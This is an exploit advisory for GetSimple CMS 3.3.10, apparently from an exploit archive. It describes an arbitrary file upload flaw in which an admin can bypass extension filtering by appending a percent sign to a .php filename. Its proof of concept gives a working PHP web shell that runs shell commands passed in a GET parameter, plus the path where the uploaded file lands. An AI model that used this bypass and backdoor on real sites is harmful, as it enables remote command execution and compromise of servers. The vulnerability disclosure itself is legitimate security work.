Getsimple CMS 3.3.10 - Arbitrary File Upload

# Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability
# Google Dork: -
# Date: 23/06/2016
# Exploit Author: s0nk3y
# Vendor Homepage: http://get-simple.info/
# Category: webapps
# Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip
# Version: 3.3.10
# Tested on: Ubuntu 16.04 / Mozilla Firefox
# Twitter: http://twitter.com/s0nk3y
# Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi
 
Description
========================
 
GetSimple CMS has been downloaded over 120,000 times (as of March 2013). 
The magazine t3n assigns GetSimple as "micro" and "Minimal-CMS" one, praises 
the simplicity yet possible extensibility through plug-ins.
 
Vulnerability
========================
 
GetSimpleCMS Version 3.3.10 suffers from arbitrary file upload vulnerability 
which allows an attacker to upload a backdoor.
 
This vulnerability is that the application uses a blacklist and whitelist 
technique to compare the file against mime types and extensions.
 
Proof of Concept
========================
 
For exploiting this vulnerability we will create a file by adding the percent 
behind extension.
1. evil.php% <--- this is simple trick :)
<?php
// simple backdoor
system($_GET['cmd']);
?>
2. An attacker login to the admin page and uploading the backdoor
3. The uploaded file will be under the "/data/uploads/" folder
 
Report Timeline
========================
2016-06-23 : Vulnerability reported to vendor
2016-06-23 : Disclosure

#  0day.today [2018-02-05]  #